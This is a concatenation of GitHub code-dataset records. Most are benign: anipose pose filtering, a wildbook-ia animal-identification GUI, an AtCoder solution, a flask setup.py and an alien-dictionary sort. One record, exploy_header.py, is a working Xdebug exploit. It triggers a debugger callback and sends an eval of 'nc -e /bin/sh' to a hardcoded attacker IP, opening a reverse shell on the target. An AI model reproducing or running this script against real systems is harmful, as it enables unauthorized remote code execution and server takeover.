stats.norm.logcdf(dists - 2, scale=thres_dist)\n cdfs = np.array([cdf_high, cdf_low])\n P_trans = logsumexp(cdfs.T, b=[1,-1], axis=2)\n\n P_trans[P_trans < -100] = -100\n\n # take care of missing transitions\n P_trans[pb[:, 0] == -1, :] = np.log(0.001)\n P_trans[:, pa[:, 0] == -1] = np.log(0.001)\n\n pflat = particles[i, :vb, 2]\n possible = T_logprob[i-1, :va] + P_trans\n\n T_logprob[i, :vb] = np.max(possible, axis=1) + np.log(pflat)\n T_back[i, :vb] = np.argmax(possible, axis=1)\n\n out = np.zeros(n_frames, dtype='int')\n out[-1] = np.argmax(T_logprob[-1])\n\n for i in range(n_frames-1, 0, -1):\n out[i-1] = T_back[i, out[i]]\n\n trace = [particles[i, out[i]] for i in range(n_frames)]\n trace = np.array(trace)\n\n points_new = trace[:, :2]\n scores_new = trace[:, 2]\n # scores_new[out >= num_points] = 0\n\n return points_new, scores_new\n\n\ndef 
viterbi_path_wrapper(args):\n jix, pts, scs, max_offset, thres_dist = args\n pts_new, scs_new = viterbi_path(pts, scs, max_offset, thres_dist)\n return jix, pts_new, scs_new\n\n\ndef load_pose_2d(fname):\n data_orig = pd.read_hdf(fname)\n scorer = data_orig.columns.levels[0][0]\n data = data_orig.loc[:, scorer]\n\n bp_index = data.columns.names.index('bodyparts')\n coord_index = data.columns.names.index('coords')\n bodyparts = list(data.columns.get_level_values(bp_index).unique())\n n_possible = len(data.columns.levels[coord_index])//3\n\n n_frames = len(data)\n n_joints = len(bodyparts)\n test = np.array(data).reshape(n_frames, n_joints, n_possible, 3)\n\n metadata = {\n 'bodyparts': bodyparts,\n 'scorer': scorer,\n 'index': data.index\n }\n\n return test, metadata\n\ndef filter_pose_viterbi(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n points_full[scores_full < config['filter']['score_threshold']] = np.nan\n\n points = np.full((n_frames, n_joints, 2), np.nan, dtype='float64')\n scores = np.empty((n_frames, n_joints), dtype='float64')\n\n if config['filter']['multiprocessing']:\n n_proc_default = max(min(cpu_count() // 2, n_joints), 1)\n n_proc = config['filter'].get('n_proc', n_proc_default)\n else:\n n_proc = 1\n ctx = get_context('spawn')\n pool = ctx.Pool(n_proc)\n\n max_offset = config['filter']['n_back']\n thres_dist = config['filter']['offset_threshold']\n\n iterable = [ (jix, points_full[:, jix, :], scores_full[:, jix],\n max_offset, thres_dist)\n for jix in range(n_joints) ]\n\n results = pool.imap_unordered(viterbi_path_wrapper, iterable)\n\n for jix, pts_new, scs_new in tqdm(results, ncols=70):\n points[:, jix] = pts_new\n scores[:, jix] = scs_new\n\n pool.close()\n pool.join()\n\n return points, scores\n\n\ndef write_pose_2d(all_points, metadata, outname=None):\n points = all_points[:, :, :2]\n scores = all_points[:, :, 2]\n\n scorer = metadata['scorer']\n bodyparts = metadata['bodyparts']\n index = metadata['index']\n\n columns = pd.MultiIndex.from_product(\n [[scorer], bodyparts, ['x', 'y', 'likelihood']],\n names=['scorer', 'bodyparts', 'coords'])\n\n dout = pd.DataFrame(columns=columns, index=index)\n\n dout.loc[:, (scorer, bodyparts, 'x')] = points[:, :, 0]\n dout.loc[:, (scorer, bodyparts, 'y')] = points[:, :, 1]\n dout.loc[:, (scorer, bodyparts, 'likelihood')] = scores\n\n if outname is not None:\n dout.to_hdf(outname, 'df_with_missing', format='table', mode='w')\n\n return dout\n\n\ndef filter_pose_medfilt(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n points = np.full((n_frames, n_joints, 2), np.nan, dtype='float64')\n scores = np.empty((n_frames, n_joints), dtype='float64')\n\n for bp_ix, bp in enumerate(bodyparts):\n x = points_full[:, bp_ix, 0, 0]\n y = points_full[:, bp_ix, 0, 1]\n score = scores_full[:, bp_ix, 0]\n\n xmed = signal.medfilt(x, kernel_size=config['filter']['medfilt'])\n ymed = signal.medfilt(y, kernel_size=config['filter']['medfilt'])\n\n errx = np.abs(x - xmed)\n erry = np.abs(y - ymed)\n err = errx + erry\n\n bad = np.zeros(len(x), dtype='bool')\n bad[err >= config['filter']['offset_threshold']] = True\n bad[score < config['filter']['score_threshold']] = True\n\n Xf = arr([x,y]).T\n Xf[bad] = np.nan\n\n Xfi = np.copy(Xf)\n\n for i in range(Xf.shape[1]):\n vals = Xfi[:, i]\n nans, ix = 
nan_helper(vals)\n # some data missing, but not too much\n if np.sum(nans) > 0 and np.mean(~nans) > 0.5 and np.sum(~nans) > 5:\n if config['filter']['spline']:\n spline = splrep(ix(~nans), vals[~nans], k=3, s=0)\n vals[nans]= splev(ix(nans), spline)\n else:\n vals[nans] = np.interp(ix(nans), ix(~nans), vals[~nans])\n Xfi[:,i] = vals\n\n points[:, bp_ix, 0] = Xfi[:, 0]\n points[:, bp_ix, 1] = Xfi[:, 1]\n # dout[scorer, bp, 'interpolated'] = np.isnan(Xf[:, 0])\n\n scores = scores_full[:, :, 0]\n\n return points, scores\n\ndef filter_pose_autoencoder_scores(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n scores_test = all_points[:, :, 0, 2]\n\n fname_model = config['filter']['autoencoder_path']\n with open(fname_model, 'rb') as f:\n mlp = pickle.load(f)\n\n scores_pred = mlp.predict_proba(scores_test)\n scores_pred_rep = np.repeat(scores_pred, n_possible, axis=1).reshape(scores_full.shape)\n\n scores_fixed = np.min([scores_pred_rep, scores_full], axis=0)\n\n return points_full, scores_fixed\n\n\ndef wrap_input(points, mean, std):\n pts_demean = (points - mean) / std\n pts_demean[~np.isfinite(pts_demean)] = 0\n # pts_demean = pts_demean - np.median(pts_demean, axis=1)[:, None]\n n_frames = pts_demean.shape[0]\n return pts_demean.reshape(n_frames, -1)\n # return np.hstack([pts_demean.reshape(n_frames, -1), scores])\n\ndef unwrap_input(X, mean, std):\n n_joints = X.shape[1] // 2\n pts_demean = X[:, :n_joints*2].reshape(-1, n_joints, 2)\n points = pts_demean * std + mean\n return points\n\n\ndef filter_pose_autoencoder_points(config, all_points, bodyparts):\n n_frames, n_joints, n_possible, _ = all_points.shape\n\n points_full = all_points[:, :, :, :2]\n scores_full = all_points[:, :, :, 2]\n\n points_test = all_points[:, :, 0, :2]\n scores_test = all_points[:, :, 0, 2]\n points_test[scores_test < 0.4] = np.nan\n\n fname_model = config['filter']['autoencoder_points_path']\n with open(fname_model, 'rb') as f:\n d = pickle.load(f)\n mlp = d['mlp']\n thres_low = d['thres_low']\n thres_lh = d['thres_lh']\n mean = d['mean']\n std = d['std']\n \n points_pred = unwrap_input(\n mlp.predict(wrap_input(\n points_test, mean, std)),\n mean, std)\n dist = np.linalg.norm(points_pred - points_test, axis=2)\n scores_pred = np.exp(-(dist - thres_low)/(thres_lh/2.3))\n scores_pred = np.clip(scores_pred, 0, 1)\n c = ~np.isfinite(scores_pred)\n scores_pred[c] = scores_test[c]\n\n scores_pred_rep = np.repeat(scores_pred, n_possible, axis=1).reshape(scores_full.shape)\n scores_fixed = np.min([scores_pred_rep, scores_full], axis=0)\n\n return points_full, scores_fixed\n\ndef wrap_points(points, scores):\n if len(points.shape) == 3: # n_possible = 1\n points = points[:, :, None]\n scores = scores[:, :, None]\n\n n_frames, n_joints, n_possible, _ = points.shape\n\n all_points = np.full((n_frames, n_joints, n_possible, 3), np.nan, dtype='float64')\n all_points[:, :, :, :2] = points\n all_points[:, :, :, 2] = scores\n\n return all_points\n\n\nFILTER_MAPPING = {\n 'medfilt': filter_pose_medfilt,\n 'viterbi': filter_pose_viterbi,\n 'autoencoder': filter_pose_autoencoder_scores,\n 'autoencoder_points': filter_pose_autoencoder_points\n}\n\nPOSSIBLE_FILTERS = FILTER_MAPPING.keys()\n\ndef process_session(config, session_path):\n pipeline_pose = config['pipeline']['pose_2d']\n pipeline_pose_filter = config['pipeline']['pose_2d_filter']\n filter_types = config['filter']['type']\n if not 
isinstance(filter_types, list):\n filter_types = [filter_types]\n\n for filter_type in filter_types:\n assert filter_type in POSSIBLE_FILTERS, \\\n \"Invalid filter type, should be one of {}, but found {}\".format(POSSIBLE_FILTERS, filter_type)\n\n pose_folder = os.path.join(session_path, pipeline_pose)\n output_folder = os.path.join(session_path, pipeline_pose_filter)\n\n pose_files = glob(os.path.join(pose_folder, '*.h5'))\n pose_files = sorted(pose_files, key=natural_keys)\n\n if len(pose_files) > 0:\n os.makedirs(output_folder, exist_ok=True)\n\n for fname in pose_files:\n basename = os.path.basename(fname)\n outpath = os.path.join(session_path,\n pipeline_pose_filter,\n basename)\n\n if os.path.exists(outpath):\n continue\n\n print(outpath)\n all_points, metadata = load_pose_2d(fname)\n\n for filter_type in filter_types:\n filter_fun = FILTER_MAPPING[filter_type]\n points, scores = filter_fun(config, all_points, metadata['bodyparts'])\n all_points = wrap_points(points, scores)\n\n write_pose_2d(all_points[:, :, 0], metadata, outpath)\n\n\nfilter_pose_all = make_process_fun(process_session)\n","repo_name":"lambdaloop/anipose","sub_path":"anipose/filter_pose.py","file_name":"filter_pose.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"77"} +{"seq_id":"72419733689","text":"# -*- coding: utf-8 -*-\nfrom functools import partial\n\nimport utool as ut\n\nimport wbia.plottool as pt\nfrom wbia.plottool import interact_helpers as ih\nfrom wbia.plottool.abstract_interaction import AbstractInteraction\nfrom wbia.viz import viz_chip, viz_matches\n\nut.noinject(__name__, '[interact_query_decision]')\n\n\n# ==========================\n# query interaction\n# ==========================\n\nNUM_TOP = 3\n\n\nclass QueryVerificationInteraction(AbstractInteraction):\n \"\"\"\n CommandLine:\n python -m wbia.viz.interact.interact_query_decision --test-QueryVerificationInteraction --show\n python -m wbia --imgsetid 2 --inc-query --yes\n\n Example:\n >>> # DISABLE_DOCTEST\n >>> from wbia.viz.interact.interact_query_decision import * # NOQA\n >>> import wbia\n >>> cm, qreq_ = wbia.testdata_cm()\n >>> comp_aids = cm.get_top_aids(NUM_TOP)\n >>> suggest_aids = comp_aids[0:1]\n >>> qvi = QueryVerificationInteraction(\n >>> qreq_, cm, comp_aids, suggest_aids, progress_current=42, progress_total=1337)\n >>> ut.show_if_requested()\n \"\"\"\n\n def __init__(\n self,\n qreq_,\n cm,\n comp_aids,\n suggest_aids,\n progress_current=None,\n progress_total=None,\n update_callback=None,\n backend_callback=None,\n name_decision_callback=None,\n **kwargs,\n ):\n print('[matchver] __init__')\n super(QueryVerificationInteraction, self).__init__(**kwargs)\n print('[matchver] comp_aids={!r}'.format(comp_aids))\n print('[matchver] suggest_aids={!r}'.format(suggest_aids))\n self.ibs = qreq_.ibs\n self.qreq_ = qreq_\n self.cm = cm\n self.query_aid = self.cm.qaid\n self.ibs.assert_valid_aids(comp_aids, verbose=True)\n self.ibs.assert_valid_aids(suggest_aids, verbose=True)\n self.ibs.assert_valid_aids((self.query_aid,), verbose=True)\n assert len(comp_aids) <= NUM_TOP\n self.comp_aids = comp_aids\n self.suggest_aids = suggest_aids\n self.suggest_aids = None # HACK TO TURN OFF SUGGESTIONS\n self.progress_current = progress_current\n self.progress_total = progress_total\n\n def _nonefn():\n return None\n\n def _nonefn2(*args):\n return None\n\n if update_callback is None:\n update_callback = _nonefn\n if backend_callback is None:\n 
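# [Editor's aside for the anipose filter_pose record above; illustrative only and not part of either original file.]
# filter_pose_medfilt masks points whose distance from a median-filtered track exceeds the configured
# offset_threshold, then re-fills the gaps by interpolation. A minimal self-contained sketch of that idea on
# toy 1-D data (the threshold of 10 is an assumed value, not taken from any real config):
#   import numpy as np
#   from scipy import signal
#   x = np.array([0., 1., 2., 50., 4., 5., 6.])   # one outlier at index 3
#   xmed = signal.medfilt(x, kernel_size=3)       # median-filtered track
#   bad = np.abs(x - xmed) >= 10                  # flags only the outlier
#   x[bad] = np.nan
#   nans = np.isnan(x)
#   x[nans] = np.interp(np.flatnonzero(nans), np.flatnonzero(~nans), x[~nans])
#   # x is now [0, 1, 2, 3, 4, 5, 6]: the outlier was replaced by linear interpolation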
backend_callback = _nonefn\n if name_decision_callback is None:\n name_decision_callback = _nonefn2\n self.update_callback = (\n update_callback # if something like qt needs a manual refresh on change\n )\n self.backend_callback = backend_callback\n self.name_decision_callback = name_decision_callback\n self.aid_checkbox_states = {}\n self.other_checkbox_states = {'none': True, 'junk': False}\n self.qres_callback = kwargs.get('qres_callback', None)\n self.infer_data()\n self.show_page(bring_to_front=True)\n\n def infer_data(self):\n \"\"\"Initialize data related to the input aids\"\"\"\n ibs = self.ibs\n\n self.query_nid = ibs.get_annot_name_rowids(self.query_aid)\n self.comp_nids = ibs.get_annot_name_rowids(self.comp_aids)\n self.query_name = ibs.get_annot_names(self.query_aid)\n self.comp_names = ibs.get_annot_names(self.comp_aids)\n\n self.aid_list = [self.query_aid] + self.comp_aids\n\n # HACK: make sure that comp_aids is of length NUM_TOP\n if len(self.comp_aids) != NUM_TOP:\n self.comp_aids += [None for i in range(NUM_TOP - len(self.comp_aids))]\n\n # column for each comparasion + the none button\n # row for the query, row for the comparasions\n self.nCols = len(self.comp_aids)\n self.nRows = 2\n\n def prepare_page(self):\n figkw = {\n 'fnum': self.fnum,\n 'doclf': True,\n 'docla': True,\n }\n self.fig = pt.figure(**figkw)\n ih.disconnect_callback(self.fig, 'button_press_event')\n ih.connect_callback(self.fig, 'button_press_event', self.figure_clicked)\n # ih.connect_callback(self.fig, 'button_press_event', self.figure_clicked)\n\n def show_page(self, bring_to_front=False):\n \"\"\"Plots all subaxes on a page\"\"\"\n print('[querydec] show_page()')\n self.prepare_page()\n # Variables we will work with to paint a pretty picture\n # ibs = self.ibs\n nRows = self.nRows\n nCols = self.nCols\n\n # Plot the Comparisions\n for count, c_aid in enumerate(self.comp_aids):\n if c_aid is not None:\n px = nCols + count + 1\n title_suffix = ''\n if self.suggest_aids is not None and c_aid in self.suggest_aids:\n title_suffix = 'SUGGESTED BY IBEIS'\n self.plot_chip(c_aid, nRows, nCols, px, title_suffix=title_suffix)\n else:\n pt.imshow_null(\n fnum=self.fnum,\n pnum=(nRows, nCols, nCols + count + 1),\n title='NO RESULT',\n )\n\n # Plot the Query Chip last\n with ut.EmbedOnException():\n query_title = 'Identify This Animal'\n self.plot_chip(self.query_aid, nRows, 1, 1, title_suffix=query_title)\n\n self.show_hud()\n pt.adjust_subplots(\n top=0.88, hspace=0.12, left=0.1, right=0.9, bottom=0.1, wspace=0.3\n )\n self.draw()\n self.show()\n if bring_to_front:\n self.bring_to_front()\n\n def plot_chip(self, aid, nRows, nCols, px, **kwargs):\n \"\"\"Plots an individual chip in a subaxis\"\"\"\n ibs = self.ibs\n enable_chip_title_prefix = ut.is_developer()\n # enable_chip_title_prefix = False\n if aid in self.comp_aids:\n score = self.cm.get_annot_scores([aid])[0]\n rawscore = self.cm.get_annot_scores([aid])[0]\n title_suf = kwargs.get('title_suffix', '')\n if score != rawscore:\n if score is None:\n title_suf += '\\n score=____'\n else:\n title_suf += '\\n score=%0.2f' % score\n title_suf += '\\n rawscore=%0.2f' % rawscore\n else:\n title_suf = kwargs.get('title_suffix', '')\n if enable_chip_title_prefix:\n title_suf = '\\n' + title_suf\n\n # nid = ibs.get_annot_name_rowids(aid)\n viz_chip_kw = {\n 'fnum': self.fnum,\n 'pnum': (nRows, nCols, px),\n 'nokpts': True,\n 'show_gname': False,\n 'show_exemplar': False,\n 'show_num_gt': False,\n 'show_gname': False,\n 'title_suffix': title_suf,\n # 'text_color': 
kwargs.get('color'),\n ###\n # 'show_name': False,\n # 'show_aidstr': False,\n 'enable_chip_title_prefix': enable_chip_title_prefix,\n 'show_name': True,\n 'show_aidstr': True,\n 'show_viewcode': True,\n 'show_quality_text': True,\n }\n\n viz_chip.show_chip(ibs, aid, **viz_chip_kw)\n ax = pt.gca()\n if kwargs.get('make_buttons', True):\n divider = pt.ensure_divider(ax)\n butkw = {'divider': divider, 'size': '13%'}\n\n self.aid2_ax = {}\n self.aid2_border = {}\n\n if aid in self.comp_aids:\n callback = partial(self.select, aid)\n self.append_button('Select This Animal', callback=callback, **butkw)\n # Hack to toggle colors\n if aid in self.aid_checkbox_states:\n # If we are selecting it, then make it green, otherwise change it back to grey\n if self.aid_checkbox_states[aid]:\n border = pt.draw_border(ax, color=(0, 1, 0), lw=4)\n else:\n border = pt.draw_border(ax, color=(0.7, 0.7, 0.7), lw=4)\n self.aid2_border[aid] = border\n else:\n self.aid_checkbox_states[aid] = False\n self.append_button('Examine', callback=partial(self.examine, aid), **butkw)\n\n def examine(self, aid, event=None):\n print(' examining aid %r against the query result' % aid)\n figtitle = 'Examine a specific image against the query'\n\n # fnum = 510\n fnum = pt.next_fnum()\n fig = pt.figure(fnum=fnum, pnum=(1, 1, 1), doclf=True, docla=True)\n # can cause freezes should be False\n INTERACT_EXAMINE = False\n if INTERACT_EXAMINE:\n # from wbia.viz.interact import interact_matches\n # fig = interact_matches.ishow_matches(self.ibs, self.cm, aid, figtitle=figtitle, fnum=fnum)\n fig = self.cm.ishow_matches(self.ibs, aid, figtitle=figtitle, fnum=fnum)\n print('Finished interact')\n # this is only relevant to matplotlib.__version__ < 1.4.2\n # raise Exception(\n # 'BLACK MAGIC: error intentionally included as a workaround that seems'\n # 'to fix a gui hang on certain computers.')\n else:\n viz_matches.show_matches(self.ibs, self.cm, aid, figtitle=figtitle)\n fig.show()\n\n def select(self, aid, event=None):\n print(' selected aid %r as best choice' % aid)\n state = self.aid_checkbox_states[aid]\n self.aid_checkbox_states[aid] = not state\n for key in self.other_checkbox_states:\n self.other_checkbox_states[key] = False\n self.update_callback()\n self.backend_callback()\n self.show_page()\n\n def select_none(self, event=None):\n for aid in self.comp_aids:\n self.aid_checkbox_states[aid] = False\n self.other_checkbox_states['none'] = True\n self.other_checkbox_states['junk'] = False\n self.update_callback()\n self.backend_callback()\n self.show_page()\n\n def select_junk(self, event=None):\n for aid in self.comp_aids:\n self.aid_checkbox_states[aid] = False\n self.other_checkbox_states['none'] = False\n self.other_checkbox_states['junk'] = True\n self.update_callback()\n self.backend_callback()\n self.show_page()\n\n def quit(self, event=None):\n self.close()\n\n def show_hud(self):\n \"\"\"Creates heads up display\"\"\"\n # Button positioners\n hl_slot, hr_slot = pt.make_bbox_positioners(\n y=0.02, w=0.16, h=3 * ut.PHI_B ** 4, xpad=0.05, startx=0, stopx=1\n )\n\n select_none_text = 'None of these'\n if self.suggest_aids is not None and len(self.suggest_aids) == 0:\n select_none_text += '\\n(SUGGESTED BY IBEIS)'\n none_tup = self.append_button(\n select_none_text, callback=partial(self.select_none), rect=hl_slot(0)\n )\n # Draw boarder around the None of these button\n none_button_axis = none_tup[1]\n if self.other_checkbox_states['none']:\n pt.draw_border(none_button_axis, color=(0, 1, 0), lw=4, adjust=False)\n else:\n 
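            # [Comment added for clarity] This mirrors the green/grey border toggle used on candidate chips in
            # plot_chip: a green border marks the currently selected choice, grey marks an unselected one.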
pt.draw_border(none_button_axis, color=(0.7, 0.7, 0.7), lw=4, adjust=False)\n\n select_junk_text = 'Junk Query Image'\n junk_tup = self.append_button(\n select_junk_text, callback=partial(self.select_junk), rect=hl_slot(1)\n )\n # Draw boarder around the None of these button\n junk_button_axis = junk_tup[1]\n if self.other_checkbox_states['junk']:\n pt.draw_border(junk_button_axis, color=(0, 1, 0), lw=4, adjust=False)\n else:\n pt.draw_border(junk_button_axis, color=(0.7, 0.7, 0.7), lw=4, adjust=False)\n\n # Add other HUD buttons\n self.append_button('Quit', callback=partial(self.quit), rect=hr_slot(0))\n self.append_button(\n 'Confirm Selection', callback=partial(self.confirm), rect=hr_slot(1)\n )\n\n if self.progress_current is not None and self.progress_total is not None:\n self.progress_string = (\n str(self.progress_current) + '/' + str(self.progress_total)\n )\n else:\n self.progress_string = ''\n figtitle_fmt = \"\"\"\n Animal Identification {progress_string}\n \"\"\"\n figtitle = figtitle_fmt.format(**self.__dict__) # sexy: using obj dict as fmtkw\n pt.set_figtitle(figtitle)\n\n def confirm(self, event=None):\n \"\"\"\n\n CommandLine:\n python -m wbia.viz.interact.interact_query_decision --test-confirm\n\n Example:\n >>> # DISABLE_DOCTEST\n >>> from wbia.viz.interact.interact_query_decision import * # NOQA\n >>> import utool as ut\n >>> # build test data\n >>> import wbia\n >>> ibs = wbia.opendb('testdb1')\n >>> self = ibs\n >>> self.ibs = ibs\n >>> selected_aids = ut.get_list_column(ibs.get_name_aids(ibs.get_valid_nids()), 0)\n >>> comfirm_res = 'jeff'\n >>> # execute function\n >>> #result = self.confirm(event)\n >>> # verify results\n >>> #print(result)\n \"\"\"\n import wbia.guitool as gt\n\n print('[interact_query_decision] Confirming selected animals.')\n\n selected_aids = [\n aid\n for aid in self.comp_aids\n if aid is not None and self.aid_checkbox_states[aid]\n ]\n if len(selected_aids) == 0:\n print('[interact_query_decision] Confirming no match.')\n chosen_aids = []\n if self.other_checkbox_states['none']:\n chosen_aids = 'newname'\n elif self.other_checkbox_states['junk']:\n chosen_aids = 'junk'\n else:\n msg = 'INTERACT_QUERY_DECISION IMPOSSIBLE STATE'\n raise AssertionError(msg)\n elif len(selected_aids) == 1:\n print('[interact_query_decision] Confirming single match')\n chosen_aids = selected_aids\n else:\n print('[interact_query_decision] Confirming merge')\n msg = ut.textblock(\n \"\"\"\n You have selected more than one animal as a match to the query\n animal. By doing this you are telling IBEIS that these are ALL\n the SAME ANIMAL. \\n\\n\\nIf this is not what you want, click\n Cancel. 
If it is what you want, choose one of the names below\n as the name to keep.\n \"\"\"\n )\n selected_names = self.ibs.get_annot_names(selected_aids)\n options = selected_names\n parent = None\n title = 'Confirm Merge'\n merge_name = gt.user_option(parent, msg=msg, title=title, options=options)\n if merge_name is None:\n print('[interact_query_decision] cancelled merge')\n self.update_callback()\n self.backend_callback()\n self.show_page()\n return\n else:\n print('[interact_query_decision] confirmed merge')\n is_merge_name = [merge_name == name_ for name_ in selected_names]\n chosen_aids = ut.sortedby(selected_aids, is_merge_name)[::-1]\n\n print('[interact_query_decision] Calling update callbacks')\n self.update_callback()\n self.backend_callback()\n print('[interact_query_decision] Calling decision callback')\n print(\n '[interact_query_decision] self.name_decision_callback = %r'\n % (self.name_decision_callback,)\n )\n if isinstance(chosen_aids, str):\n # hack for string non-match commands\n chosen_names = chosen_aids\n else:\n chosen_names = self.ibs.get_annot_names(chosen_aids)\n self.name_decision_callback(chosen_names)\n print(\n '[interact_query_decision] sent name_decision_callback(chosen_names=%r)'\n % (chosen_names,)\n )\n\n def figure_clicked(self, event=None):\n import wbia.guitool as gt\n from wbia.viz import viz_helpers as vh\n\n ax = event.inaxes\n if ih.clicked_inside_axis(event):\n viztype = vh.get_ibsdat(ax, 'viztype')\n if viztype == 'chip':\n aid = vh.get_ibsdat(ax, 'aid')\n print('... aid=%r' % aid)\n if event.button == 3: # right-click\n from wbia.viz.interact import interact_chip\n\n height = self.fig.canvas.geometry().height()\n qpoint = gt.newQPoint(event.x, height - event.y)\n if self.qreq_ is None:\n config2_ = None\n else:\n if aid in self.qreq_.qaids:\n config2_ = self.qreq_.query_config2_\n else:\n config2_ = self.qreq_.data_config2_\n callback_list = interact_chip.build_annot_context_options(\n self.ibs, aid, refresh_func=self.show_page, config2_=config2_\n )\n gt.popup_menu(self.fig.canvas, qpoint, callback_list)\n # interact_chip.show_annot_context_menu(\n # self.ibs, aid, self.fig.canvas, qpoint, refresh_func=self.show_page)\n # self.show_page()\n # ibs.print_annotation_table()\n print(ut.repr2(event.__dict__))\n","repo_name":"WildMeOrg/wildbook-ia","sub_path":"wbia/viz/interact/interact_query_decision.py","file_name":"interact_query_decision.py","file_ext":"py","file_size_in_byte":17472,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"77"} +{"seq_id":"8231025375","text":"import collections\nimport math\n\nK = int(input())\n\ndef main(K):\n for i in range(2*10**6)[1:]:\n K = int(K/math.gcd(K,i))\n if K == 1:\n return i\n return K\n\nprint(main(K))","repo_name":"SWEET-creator/Atcoder","sub_path":"AtCoder_Beginner_Contest/280/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2396323979","text":"from setuptools import setup, find_packages\nimport pathlib\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name='build-flask-app',\n description='Set up a modern flask web server by running one command.',\n long_description=README,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(),\n version='0.1.0',\n license='MIT',\n author='Kushagra Bainsla',\n author_email='kushagrabainsla@gmail.com',\n 
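    # [Editor's aside for the AtCoder snippet above; illustrative only and not part of either original file.]
    # main(K) strips from K every factor it shares with 1, 2, ..., i in turn, so it returns the smallest i
    # such that i! is a multiple of K. For example, main(8) == 4 (3! = 6 is not divisible by 8, but 4! = 24 is)
    # and main(6) == 3.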
url='https://github.com/Kushagrabainsla/build-flask-app',\n    install_requires=[\n        'Flask',\n        'Flask-SQLAlchemy',\n        'Flask-SocketIO',\n        'gunicorn',\n        'eventlet',\n        'gevent',\n        'dnspython',\n        'pymongo',\n        'Flask-PyMongo',\n        'PyInquirer',\n        'termcolor',\n        'flask-cors',\n    ],\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    entry_points = {\n        'console_scripts': ['build-flask-app=build_flask_app.main:main'],\n    },\n)","repo_name":"Kushagrabainsla/build-flask-app","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"}
+{"seq_id":"74661849849","text":"#!/usr/bin/python3\n\nimport socket, requests, sys\nfrom base64 import b64encode\n\nif len(sys.argv) != 6:\n    print(\"\\n[*] usage: python3 {} <ext_port> <ext_host> <local_port> <local_host> <context>\\n \".format(sys.argv[0]))\n    sys.exit(1)\n\n#start Listener \next_port =int(sys.argv[1])\next_host =sys.argv[2]\nlocal_host = sys.argv[4]\nlocal_port= int(sys.argv[3])\ncontext= sys.argv[5]\nattack_host=\"10.10.14.46\"\nattack_port=\"5656\"\nprint(\"\\n[*] Starting listener on {}:{}\".format(local_host,local_port))\n\nsk= socket.socket()\nsk.bind((local_host,local_port))\nsk.listen(10)\n\nprint(\"\\n[*] Listening....\")\nprint(\"\\n[*] Continue process \")\ntry:\n    print(\"\\n[*] Start socket with {}:{}\".format(ext_host,ext_port))\n    uri=\"http://\"+ext_host+\":\"+sys.argv[1]+\"/\"+context\n    print(\"\\n[*] uri request : {}\".format(uri))\n    print(\"\\n[*] send request ...... \")\n    r = requests.get(uri, headers={\"Cookie\":\"XDEBUG_SESSION=llllllllll\"}, timeout=2)\n    print(\"----------\")\n\nexcept:\n    pass\n\n#catch callback\nconn, addr =sk.accept()\nprint(\"\\n [*] accept connection \")\nclient_data = conn.recv(1024)\nprint(\"\\n[*] connection received from {}:{} on port {}\".format(addr[0],addr[1],sys.argv[3]))\nprint((conn))\nprint((client_data))\n\ncmd = 'system(\"nc -e /bin/sh {} {}\")'.format(attack_host,attack_port).encode('utf-8')\nprint(\"\\n[*] send cmd command: {}\".format(cmd))\nconn.sendall(('eval -i 1 -- %s\\x00' % b64encode(cmd).decode('utf-8')).encode('utf-8'))\nprint(\"\\n[*] exec reverse-shell from {}:{} to {}:{}\".format(attack_host,attack_port,ext_host,sys.argv[1]))\nsk.close()\nconn.close()\n","repo_name":"f0ns1/security-scripts","sub_path":"exploy_header.py","file_name":"exploy_header.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"72799129849","text":"def create_graph(words):\n    letters = set(''.join(words))\n    graph = {letter: [] for letter in letters}\n\n    for pair in zip(words, words[1:]):\n        for before, after in zip(*pair):\n            if before != after:\n                graph[before].append(after)\n                break\n\n    return graph\n\nfrom collections import deque\n\ndef visit(letter, graph, visited, order):\n    visited.add(letter)\n\n    for next_letter in graph[letter]:\n        if next_letter not in visited:\n            visit(next_letter, graph, visited, order)\n\n    order.appendleft(letter)\n\ndef toposort(graph):\n    visited = set()\n    order = deque([])\n\n    for letter in graph:\n        if letter not in visited:\n            visit(letter, graph, visited, order)\n\n    return list(order)\n\ndef alien_letter_order(words):\n    graph = create_graph(words)\n    return toposort(graph)\n","repo_name":"LennyGonz/LeetCode-Questions","sub_path":"Daily-Coding-Problem/problem-226.py","file_name":"problem-226.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
